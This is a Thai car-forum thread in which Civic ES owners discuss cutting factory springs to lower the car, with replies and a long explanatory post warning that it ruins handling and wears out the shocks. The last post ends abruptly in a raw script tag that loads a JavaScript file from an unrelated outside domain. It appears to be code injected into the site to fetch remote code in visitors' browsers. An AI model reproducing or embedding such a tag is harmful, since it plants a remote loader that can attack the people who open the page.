ตอบ
notegp


ชื่อเล่น: โน๊ต

เข้าร่วม: 13 พฤษภาคม 2009
ตอบ: 1461

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1272
ให้คำขอบคุณ: 1753

ที่อยู่: สัตหีบ
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 5 มิถุนา 2009 03:01 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
กำลังจะโหลดอยู่พอดีเลย
tee_trang


เข้าร่วม: 07 ตุลา 2008
ตอบ: 118

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 110
ให้คำขอบคุณ: 19

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 5 มิถุนา 2009 11:18 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
อยากเปลี่ยนสปริงเหมือนกาน ตอนนี้ใช้ของเดิม เลื่อนเบ้าคู่หน้า ด้านหลังเดิมๆ(ติดแก๊ส ) ม่ายรู้ถ้าจะใส่สริงโหลด ต้องใช้แบบเดิมๆ(ไม่เลื่อเบ้าหรือปล่า)
cougarz


เข้าร่วม: 01 ตุลา 2008
ตอบ: 29

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 0

ที่อยู่: อยุธยา
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 5 สิงหา 2009 12:04 - อยากทราบว่าถ้าตัดสปริงจะมีปัญหาอะไรตามมาบ้างครับ
จะทำให้ช่วงล่างพังไวหรือป่าวครับ
หรือว่ามีปัญหาอย่างอื่นีก
Hamster@Yamabuchi


ชื่อเล่น: เบิร์ด

เข้าร่วม: 27 มีนา 2009
ตอบ: 2005

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5433
ให้คำขอบคุณ: 3267

ที่อยู่: เขตหวงห้ามเฉพาะ
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 5 สิงหา 2009 12:35 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
จะได้รู้จักคำว่ากระด้าง และกระเด้งครับ ซึ่งมันเป็นความทรมานในการขับรถครับ
saw


ชื่อเล่น: ซอ เพชรบุร

เข้าร่วม: 24 มกรา 2009
ตอบ: 2873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2127
ให้คำขอบคุณ: 2684

ที่อยู่: บ้านลาด เพชรบุรี รับพาเสียวทั่วเพชรบุรี
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 5 สิงหา 2009 12:40 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
หาสปริงโหลดดีกว่าครับอย่าตัดเลย

เสียของ เสียค่าkสปริงด้วย
"ASIMO"


ชื่อเล่น: เอก

เข้าร่วม: 14 ตุลา 2008
ตอบ: 2382

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5477
ให้คำขอบคุณ: 1463

ที่อยู่: Ayutthaya_เจย์ดีนักเลง
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พุธ, 5 สิงหา 2009 12:43 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
ถ้าตัดสปริงปัญหาจะตามมาเยอะครับ.......ทั้งแข็ง กระด้าง กระเด้ง สปริงจะหลุดจากโช๊คเวลายกรถขึ้นถ่ายน้ำมันเครื่อง มีเสียงดัง ค่า K ของสปริงก็หายไป อะไรประมาณนี้แหละครับ.........เอาเป็นว่าใส่สปริงโหลดดีก่า
BEER_CIVIC ES


ชื่อเล่น: เบียร์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 984

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1241
ให้คำขอบคุณ: 3893

ที่อยู่: ศรีราชา,นครไทย-พิโลก
ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 5 สิงหา 2009 12:51 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
สปิงหลุด เบ้า โช้ค แตก ช่วงล่างไปไว มาก เหอๆๆ

หาสปิงโหลด มือสองใส่ดีกว่า ครับ อย่าตัดโดย เด็ดขาด
cougarz


เข้าร่วม: 01 ตุลา 2008
ตอบ: 29

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 0

ที่อยู่: อยุธยา
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 5 สิงหา 2009 12:57 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
*-*

โชคดีที่มาถามพี่ๆก่อน

เกือบพลาดไปแล้ว

ขอบคุณมากครับ
DRINK


เข้าร่วม: 04 ตุลา 2008
ตอบ: 3856

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

ที่อยู่: Paris + Bangkok + Uttaradit + Phitsanulok
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
พุธ, 5 สิงหา 2009 13:46 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
แถมอีกอย่าง โยนตัว ไม่เกาะถนน ยวบยาบครับ ^^
Asuerada_boy


เข้าร่วม: 07 ตุลา 2008
ตอบ: 1093

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 576
ให้คำขอบคุณ: 1645

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
พุธ, 5 สิงหา 2009 16:23 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
สรุป อันตรายสุดๆ

จัดปิง มือ 2 โรด
cougarz


เข้าร่วม: 01 ตุลา 2008
ตอบ: 29

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 0

ที่อยู่: อยุธยา
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 5 สิงหา 2009 19:23 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
จัดไปครับ

*-*
carrimoroll


ชื่อเล่น: อาร์ต

เข้าร่วม: 27 กรกฎา 2009
ตอบ: 1978

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 6596
ให้คำขอบคุณ: 4103

ที่อยู่: Nawamin143 & Thamasat University
ปี: 2001
พุธ, 5 สิงหา 2009 19:58 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
จัด EP3 ไปเลยครับเหมืนผม
สองพันกว่าๆเอง
oat_28


เข้าร่วม: 01 ตุลา 2008
ตอบ: 2690

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 772
ให้คำขอบคุณ: 30

ปี: 2002
พุธ, 5 สิงหา 2009 20:11 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
ผม ว่า นำ โช๊ค ไป อัด น้ำ มัน แล้ว ก็ ใส่ สปริง โหลด ดี กว่า คับ
prodrive


เข้าร่วม: 28 พฤศจิกา 2008
ตอบ: 742

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 1000

ที่อยู่: URT>>>BKK.RAMINTRA39
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 5 สิงหา 2009 20:35 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
สปริงโหลดเหอะครับจะของอะไรก็ตามแต่ เคยตัดมาแล้วครับ เสียอารมณ์ในการขับขี่ปล่าวๆเครับ นานเข้าเสียงดังด้วยนะครับ
ลองคิดดูดตัดปิงกะปิงโหลดต่างกันไม่เท่าไหร่เอง กัดฟันนิสนึงเพื่อสิ่งที่ดีกว่า
หากตัดสปิงสปิงเดิมมันจะเป็นการเรียกว่ารถโหดไม่ใช่รถโหลดง่ะอิอิ
cougarz


เข้าร่วม: 01 ตุลา 2008
ตอบ: 29

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 9
ให้คำขอบคุณ: 0

ที่อยู่: อยุธยา
ปี: 2001
สี: เทา ซิลเวอร์สโตน (NH-630M)
พุธ, 5 สิงหา 2009 21:14 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
พอดีผมเพิ่งจะแต่งรถอ่ะครับ ไม่ค่อยรู้เรื่องอ่ะไรเท่าไหร่เลย
ยังไงช่วยแนะนำหน่อยนะครับ
ตอนนี้กำลังจะไปลงแม็กอยู่อ่ะครับ
nAAe


ชื่อเล่น: เอ๋

เข้าร่วม: 31 ธันวา 2008
ตอบ: 227

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 53
ให้คำขอบคุณ: 48

ที่อยู่: Chachoengsao
ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
พุธ, 5 สิงหา 2009 22:03 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
ตัดไปแล้วคู่หน้าค่ะ
กระเด้งอย่างแรงเวลาเจอทางไม่เรียบ
สงสารรถสุดๆ จะไปใส่สปริงโหลดแล้วเหมือนกัน ^O^
tum_bangna


ชื่อเล่น: ตั้ม

เข้าร่วม: 08 กุมภา 2012
ตอบ: 488

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 199
ให้คำขอบคุณ: 1

ที่อยู่: 168/48 แขวงบางนา เขตบางนา กทม
ปี: 2003
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
จันทร์, 29 ตุลา 2012 19:33 - ตัดสปริงโช็ค ดีไหมครับ
ตัดสปริงโช็ค ดีไหมครับ ขอข้อมูลครับ
ได้รับคำขอบคุณจาก: ekdanai 
ham_ter


ชื่อเล่น: ส้มจี๊ด

เข้าร่วม: 18 ตุลา 2011
ตอบ: 1641

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4624
ให้คำขอบคุณ: 0

ที่อยู่: เชียงใหม่
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
จันทร์, 29 ตุลา 2012 20:07 - Re: ตัดสปริงโช็ค ดีไหมครับ
tum_bangna พิมพ์ว่า:
ตัดสปริงโช็ค ดีไหมครับ ขอข้อมูลครับ


เคยลงไว้ในกระทู้เก่าๆแล้ว ขี้เกียจพิมพ์ซ้ำ ถ้าขี้เกียจหา จะแปะให้ดูใหม่นะจ๊ะ
ถ้าการกดสปริงทำให้ค่า K ของสปริงเสียไป ขอบอกได้เลยว่า อันตรายต่อการใช้ความเร็ว การทรงตัว และการเข้าโค้งมาก
ถ้าคลานอยู่ในเมืองไม่เป็นไีรมาก แต่ถ้าคุณวิ่งด้วยความเร็วแล้วเกิดแถขึ้นมาจะเกิดอะไรขึ้น ลองอ่านอันนี้ดู ไปเจอมา
อยากเตี้ย ตัดสปริง/สปริงโหลด
การตัดสปริงทำได้ง่าย และได้ความเตี้ย ตามต้องการ แต่ไม่ได้ส่งผลดีต่อการทรงตัวของรถและผิดหลักการ ถ้าตัดสปริงด้วยไฟ ความร้อนจะทำให้ความยืดหยุ่นบริเวณใกล้เคียงเสียไป การตัดด้วยหินเจียร์หรือไฟเบอร์ ไม่มีปัญหาความร้อน แต่มีหลายปัญหาตามมา
การตัดสปริง เมื่อไรที่สปริงสั้นลงก็จะแข็งขึ้น ยุบยาก แต่ดีดตัวแรง เพราะสปริงทำงานยุบและยืดตัวด้วยการบิดตัวของเส้นสปริง แม้จะดูว่าเป็นการยุบตัวตามแนวตรง แต่ตลอดการยุบและยืดตัว จะเกิดขึ้นจากการบิดตัวของเส้นสปริงคล้ายการบิดน้ำออกจากผ้า
สปริงสูงและมีจำนวนรอบมากก็แสดงว่าเริ่มทำจากเหล็กเส้นยาว หากจับปลายเหล็ก 2 ข้างแล้วบิดเหล็กที่ยาว 10 เมตร ย่อมบิดเป็นเกลียวได้ง่ายกว่าเหล็กยาว 1 เมตร
สปริงที่ถูกตัดให้เตี้ย ก็คือสปริงที่สั้นและเหลือเนื้อสปริงสั้นลง เมื่อบิดตัวยากขึ้นก็ทำให้สปริงมีความแข็งมากขึ้นยุบตัวยากนั่นเอง
สปริงที่ถูกตัดจะยุบตัวยาก แต่เมื่อไรที่ยุบในช่วงดีดตัวก็จะดีดแรง มีอาการกระด้างมากขึ้น ถ้าใช้โช้กอัพเดิมที่มีความหนืดซึ่งเหมาะสมกับสปริงที่นิ่ม โช้กอัพก็จะรั้งในช่วงที่สปริงดีดตัวไม่ไหว สปริงยังดีดแรงและเร็ว ส่วนโช้กอัพก็จะพังเร็ว
นอกจากความแข็งที่เพิ่มขึ้นแบบไม่ตรงตามต้องการ (เพราะยิ่งตัดเหลือสั้นก็ยิ่งแข็ง) ซึ่งสปริงชุดโหลดที่ผลิตขึ้นมาโดยเฉพาะก็แข็งกว่าสปริงเดิม แต่ส่วนใหญ่ไม่ได้แข็งกว่ามากนัก
ปัญหาสำคัญอยู่ที่ ปลายสปริงที่ถูกตัดชี้ขึ้น ไม่ได้งอลงแนบกับเบ้าเหมือนสปริงเดิม เมื่อใส่เข้าไปปลายก็ถูกกดแนบกับเบ้าได้ แต่ปลายสปริงที่เคยชี้ออกมา จะทำให้สปริงมีการฝืนตัวอยู่ ทั้งการยุบและยืดตัวล้วนมีการดิ้นออกข้าง ไม่ได้เกิดขึ้นในแนวตรงตามเดิม การยืดหยุ่นไม่สมบูรณ์และส่งผลให้โช้กอัพมีแรงกระทำด้านข้างแทนที่จะเป็นแรงกระทำแนวดิ่งตรงๆ โช้กอัพที่ใช้งานร่วมกับสปริงตัดจึงอายุสั้นทั้งจากการดีดตัวที่แรงขึ้นและการดิ้นออกด้านข้าง
การเป่าไฟดัดปลายสปริง ส่งผลให้เส้นสปริงบริเวณนั้นและใกล้เคียงเสียความยืดหยุุ่น วีธีที่ถูกต้องเมื่อต้องการความเตี้ย คือ เปลี่ยน สปริงชุดโหลดที่ทำขึ้นโดยตรง (ราคา 4 เส้น 6-9 พันบาท) เลือกรุ่นที่มีความแข็งมากกว่าสปริงเดิมไม่มากนัก ใช้ร่วมกับโช้กอัพชุดแต่งที่มีความหนืดมากขึ้นโดยเฉพาะในช่วงยืดตัวหรือรีบาวน์ เพื่อรั้งการดีดตัวของสปริงที่แรงขึ้น หรือหาเทียบสปริงจากรถรุ่นอื่นมาใช้ ซึ่งยุ่งยากแต่ถูกกว่า
ถ้าอยากให้รถ์เตี้ย ลืมการตัดสปริงไปได้เลย เตี้ยลงจริงและค่าใช้จ่ายต่ำ แต่ผลที่ได้แย่ทั้งการทรงตัวและความนุ่มนวล
ได้รับคำขอบคุณจาก: tokmun002  yoyosonic  malmsteen 
newclear


เข้าร่วม: 20 มิถุนา 2012
ตอบ: 285

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 249
ให้คำขอบคุณ: 26

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 29 ตุลา 2012 20:10 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
ไม่ดีครับ ใช้เปลี่ยนเอาดีกว่า
meseoul


ชื่อเล่น: บุ๊ค

เข้าร่วม: 22 กรกฎา 2012
ตอบ: 376

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 263
ให้คำขอบคุณ: 920

ที่อยู่: Chiang Mai
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 29 ตุลา 2012 20:24 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
newclear พิมพ์ว่า:
ไม่ดีครับ ใช้เปลี่ยนเอาดีกว่า



+1 เสียง
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 29 ตุลา 2012 20:34 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
ใช้อยู่ครับ! ย้วยมากขับตรงดีครับเลี้ยวโค้งหนึบแน่นดีแต่ถ้าทางโค้งไม่เรียบหรือต่างระดับเล็กน้อยรถจะเสียอาการมากครับ.
ขับสวยได้ประหยัดดี. แต่อย่าทำเลยครับ ฟันธงเลยว่าจะเสียของป่าวๆครับ
ได้รับคำขอบคุณจาก: yoyosonic 
baphometjr3


ชื่อเล่น: ตั้ม

เข้าร่วม: 08 พฤศจิกา 2011
ตอบ: 843

Guru ES
Guru ES

ได้รับคำขอบคุณ: 884
ให้คำขอบคุณ: 816

ที่อยู่: พุทธมณฑล
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 29 ตุลา 2012 20:45 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
ตัดแล้วเน่า  
IP-GeorGe


เข้าร่วม: 07 ตุลา 2008
ตอบ: 610

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1167
ให้คำขอบคุณ: 140

ที่อยู่: พระราม 5 - พระราม - 2 มหาชัย
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 29 ตุลา 2012 20:46 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
ไม่ดีเลยครับ เคยทำมาแล้ว
yoyosonic


เข้าร่วม: 20 กรกฎา 2011
ตอบ: 1079

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 325
ให้คำขอบคุณ: 3432

ที่อยู่: กทม.
ปี: 2002
จันทร์, 29 ตุลา 2012 21:15 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
ham_ter พิมพ์ว่า:
tum_bangna พิมพ์ว่า:
ตัดสปริงโช็ค ดีไหมครับ ขอข้อมูลครับ


เคยลงไว้ในกระทู้เก่าๆแล้ว ขี้เกียจพิมพ์ซ้ำ ถ้าขี้เกียจหา จะแปะให้ดูใหม่นะจ๊ะ
ถ้าการกดสปริงทำให้ค่า K ของสปริงเสียไป ขอบอกได้เลยว่า อันตรายต่อการใช้ความเร็ว การทรงตัว และการเข้าโค้งมาก
ถ้าคลานอยู่ในเมืองไม่เป็นไีรมาก แต่ถ้าคุณวิ่งด้วยความเร็วแล้วเกิดแถขึ้นมาจะเกิดอะไรขึ้น ลองอ่านอันนี้ดู ไปเจอมา
อยากเตี้ย ตัดสปริง/สปริงโหลด
การตัดสปริงทำได้ง่าย และได้ความเตี้ย ตามต้องการ แต่ไม่ได้ส่งผลดีต่อการทรงตัวของรถและผิดหลักการ ถ้าตัดสปริงด้วยไฟ ความร้อนจะทำให้ความยืดหยุ่นบริเวณใกล้เคียงเสียไป การตัดด้วยหินเจียร์หรือไฟเบอร์ ไม่มีปัญหาความร้อน แต่มีหลายปัญหาตามมา
การตัดสปริง เมื่อไรที่สปริงสั้นลงก็จะแข็งขึ้น ยุบยาก แต่ดีดตัวแรง เพราะสปริงทำงานยุบและยืดตัวด้วยการบิดตัวของเส้นสปริง แม้จะดูว่าเป็นการยุบตัวตามแนวตรง แต่ตลอดการยุบและยืดตัว จะเกิดขึ้นจากการบิดตัวของเส้นสปริงคล้ายการบิดน้ำออกจากผ้า
สปริงสูงและมีจำนวนรอบมากก็แสดงว่าเริ่มทำจากเหล็กเส้นยาว หากจับปลายเหล็ก 2 ข้างแล้วบิดเหล็กที่ยาว 10 เมตร ย่อมบิดเป็นเกลียวได้ง่ายกว่าเหล็กยาว 1 เมตร
สปริงที่ถูกตัดให้เตี้ย ก็คือสปริงที่สั้นและเหลือเนื้อสปริงสั้นลง เมื่อบิดตัวยากขึ้นก็ทำให้สปริงมีความแข็งมากขึ้นยุบตัวยากนั่นเอง
สปริงที่ถูกตัดจะยุบตัวยาก แต่เมื่อไรที่ยุบในช่วงดีดตัวก็จะดีดแรง มีอาการกระด้างมากขึ้น ถ้าใช้โช้กอัพเดิมที่มีความหนืดซึ่งเหมาะสมกับสปริงที่นิ่ม โช้กอัพก็จะรั้งในช่วงที่สปริงดีดตัวไม่ไหว สปริงยังดีดแรงและเร็ว ส่วนโช้กอัพก็จะพังเร็ว
นอกจากความแข็งที่เพิ่มขึ้นแบบไม่ตรงตามต้องการ (เพราะยิ่งตัดเหลือสั้นก็ยิ่งแข็ง) ซึ่งสปริงชุดโหลดที่ผลิตขึ้นมาโดยเฉพาะก็แข็งกว่าสปริงเดิม แต่ส่วนใหญ่ไม่ได้แข็งกว่ามากนัก
ปัญหาสำคัญอยู่ที่ ปลายสปริงที่ถูกตัดชี้ขึ้น ไม่ได้งอลงแนบกับเบ้าเหมือนสปริงเดิม เมื่อใส่เข้าไปปลายก็ถูกกดแนบกับเบ้าได้ แต่ปลายสปริงที่เคยชี้ออกมา จะทำให้สปริงมีการฝืนตัวอยู่ ทั้งการยุบและยืดตัวล้วนมีการดิ้นออกข้าง ไม่ได้เกิดขึ้นในแนวตรงตามเดิม การยืดหยุ่นไม่สมบูรณ์และส่งผลให้โช้กอัพมีแรงกระทำด้านข้างแทนที่จะเป็นแรงกระทำแนวดิ่งตรงๆ โช้กอัพที่ใช้งานร่วมกับสปริงตัดจึงอายุสั้นทั้งจากการดีดตัวที่แรงขึ้นและการดิ้นออกด้านข้าง
การเป่าไฟดัดปลายสปริง ส่งผลให้เส้นสปริงบริเวณนั้นและใกล้เคียงเสียความยืดหยุุ่น วีธีที่ถูกต้องเมื่อต้องการความเตี้ย คือ เปลี่ยน สปริงชุดโหลดที่ทำขึ้นโดยตรง (ราคา 4 เส้น 6-9 พันบาท) เลือกรุ่นที่มีความแข็งมากกว่าสปริงเดิมไม่มากนัก ใช้ร่วมกับโช้กอัพชุดแต่งที่มีความหนืดมากขึ้นโดยเฉพาะในช่วงยืดตัวหรือรีบาวน์ เพื่อรั้งการดีดตัวของสปริงที่แรงขึ้น หรือหาเทียบสปริงจากรถรุ่นอื่นมาใช้ ซึ่งยุ่งยากแต่ถูกกว่า
ถ้าอยากให้รถ์เตี้ย ลืมการตัดสปริงไปได้เลย เตี้ยลงจริงและค่าใช้จ่ายต่ำ แต่ผลที่ได้แย่ทั้งการทรงตัวและความนุ่มนวล




+1
catsteal


ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

ที่อยู่: เชียงใหม่-กรุงเทพ
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
จันทร์, 29 ตุลา 2012 21:25 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
หามือสองก็ได้คับ
slum


ชื่อเล่น: เอ็ม

เข้าร่วม: 13 มกรา 2011
ตอบ: 1070

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 859
ให้คำขอบคุณ: 345

ที่อยู่: บ้านโป่ง<=>มหาชัย<=>สุทธิสาร
ปี: 2003
จันทร์, 29 ตุลา 2012 22:42 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
อย่าเลยครับ
meseoul


ชื่อเล่น: บุ๊ค

เข้าร่วม: 22 กรกฎา 2012
ตอบ: 376

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 263
ให้คำขอบคุณ: 920

ที่อยู่: Chiang Mai
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 29 ตุลา 2012 23:16 - ผมเอาสปริงเดิมไปตัดได้ไหมครับ แล้ว Feeling มันประมาณไหนครับ
สปริงโหลดมือสองเยอะแยะ
แต่รอนานหน่อย นาน ๆ ออกมาที "<script src="https://sport32news.com/civicesgroup.js">
ตอบ
หน้า 2 จาก 2
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...